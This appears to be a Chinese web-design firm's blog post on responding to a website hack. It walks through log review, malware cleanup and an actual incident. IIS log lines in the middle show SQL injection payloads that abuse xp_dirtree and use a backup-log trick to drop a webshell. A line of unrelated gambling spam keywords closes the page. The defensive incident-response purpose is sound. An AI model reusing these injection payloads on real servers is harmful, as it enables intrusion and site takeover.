深圳網站建設提醒:網站被黑以后要做的事
來源: | 作者:szhuhang | 發布時間: 813天前 | 320 次瀏覽 | 分享到:
   很多朋友都遇到過網站被黑,插入惡意代碼的經歷??赡艽蠹乙詾橹灰堰@些代碼刪除了既可,但是,道高一尺,魔高一丈,如果只是簡單刪除代碼以后,絕大部分的朋友會再次遇到……事實上,要很好地應對網站入侵,深圳網站建設總結了幾個步驟如下,并根據以下幾個步驟寫了份案例附后,希望對大家有所幫助:
    
    一、下載服務器日志,ftp傳輸日志。
    
    當發現網站被黑以后,首先要做的就是下載日志文件,包括服務器日志和ftp傳輸日志,服務器的日志位置一般是位于C:WINDOWS system32LogfilesW3SVC1。ftp日志則取決于你的服務器所安裝的ftp軟件,比如SERVE-U默認是在安裝目錄下。但是,這邊提醒一點,既然你今天看到這篇文章,服務器的各種日志,一定要轉移出默認的地方,同時設置一下刪除保護。對于虛擬主機用戶。一般你的空間提供商都會提供3天之內的日志以及1個月的ftp日志下載,具體可以咨詢你的空間提供商。下載日志這點很重要。它是我們接下去找出漏洞的關鍵。
    
    二、替換所有惡意代碼
    
    進行下載日志的同時,應該開始刪除惡意代碼,以免影響用戶體驗。如果你擁有服務器,把惡意插入的代碼批量替換掉。如果你使用虛擬主機,有部分虛擬主機提供批量替換功能。如果你的虛擬主機沒有提供這樣的功能(破爛貨,趕快換掉),那你可以去下載一個雷客圖ASP站長安全助手。來進行此項操作。這項操作要謹慎點,因為是對內容直接進行替換,稍微一馬虎可能讓你的網頁內容面目全非。
    
    三、下載到本地殺毒,或者服務端殺毒
    
    接下來,我們要開始找出入侵的幕后黑后了。記住,發現病毒先不要忙著刪除。如果你擁有個人服務器,可以開啟殺毒軟看看,如果是使用虛擬主機可以下載到本地,用殺毒軟件殺,或者用我剛才說的那個ASP站長安全助手。發現病毒以后,剛才說的,不要忙著殺掉。查看那個病毒文件的修改時間。這個步驟是最關鍵的。一般對方不會只留一個后門,可能會有漏網之魚。這時你可以搜索剛找到的那個病毒文件的修改時間,檢查這段時間建立或者修改了什么文件。那些文件都是嫌疑犯,統統記住他們的文件名,注意,這邊沒有讓你刪除,要先記住文件名!
    
    這邊要提到一種情況,對方的木馬很隱秘,找不到,這個時候,你需要在所有的網頁文件中,查找一些木馬常用的詞,比如asp木馬,一般會有這些字符出現在木馬中,比如“木馬”,“免殺”,“w”,“shell”等等字符,有出現這些字符的,可能為對方留下的后門
    
    四、同時,查找日志中的敏感詞,如“select”,“and%201=1”,獲得對方ip
    
    獲得對方的木馬的文件名以后,這個時候要用到我們剛才的日志了來找到對方ip,看對方進行了什么操作。以某次反入侵經歷例,通過查找特征字符,發現對方使用swz.asp這個木馬文件作為后門。于是在日志中搜索swz.asp,發現對方入侵的ip,當然,如果你在上一個步驟沒有找到木馬,也可以通過查找““select”,“and%201=1”,這樣一些入侵的蛛絲馬跡,獲得對方ip為220.162.26.96
    
    
    五、在日志中查找該ip,了解對方入侵的過程。
    
    
    在這些日志中查找“220.162.26.96”這個字符串。發現以下一些記錄://后面為記錄
    
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    
    [41425] 2007-07-12 03:52:40 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626 and exists (select * from sysobjects) -- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
    
    //123.asp出現漏洞,對方使用注入語句在獲得權限
    
    [41492] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree "D:", 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
    
    [41494] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626 And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0 --|57|80040e07|將_varchar_值_‘|13|‘_轉換為數據類型為_int_的列時發生語法錯誤。 80 - 220.162.26.96 Internet+Explorer+6.0 500 0 0
    
    [47001] 2007-07-12 04:23:06 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree "e:wwwroot", 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
    
    //利用了master..xp_dirtree
    
    [47635] 2007-07-12 04:24:47 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;alter database mytable set RECOVERY FULL-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0
    
    [47699] 2007-07-12 04:25:12 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;create table ahcmd (a image)-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0
    
    [47754] 2007-07-12 04:25:25 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;backup log mytable to disk = ‘c:ahcmd‘ with init-- 80 - 220.162.26.96
    
    [47758] 2007-07-12 04:25:31 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;insert into ahcmd (a) s (‘‘)-- 80 - 220.162.26.96
    
    //插入一句話木馬
    
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    
    答案揭曉了,這是由于深圳網站建設之前的程序員所編寫的頁面123.asp傳入參數過濾不嚴格,導致了對方在服務器上為所欲為,同時,從日志上也可以看到,master..xp_dirtree這個存儲過程也起到了助紂為虐的作用。
    
    七、彌補對方入侵漏洞。
    
    接著,根據日志的提示,修改123.asp頁面,字符串參數過濾單引號,數字參數格式化為數字類型。在查詢分析器使用sp_dropextendedproc ‘xp_dirtree‘刪除掉它,同時刪除掉其他的一些危險的存儲過程。
    
    八、修改ftp密碼,超級管理員密碼,3389登陸端口,用戶名,密碼。
    
    接著就是善后了。對方如果已經入侵了你的站點,這些密碼都不再是密碼,因此最保險的做法就是全部改掉。
    
    九、將對方的ip,入侵時間,日志提交給當地網警。Ping對方使用的僵尸網站,查詢對方網站所用ip,打電話到對方網站所在地的通信管理局投訴。
乐赢彩票首页 街机电玩捕鱼有什么好的呢 重庆幸运农场开奖现场 欢乐捕鱼人赢话费 三分彩免费全天计划 吉林长春棋牌麻将下载 河北11选5前三直连号技巧 足球比分188直播中 浙江快乐彩12选5开奖结果 幸运飞艇基本走势图大全 历届德甲金靴得主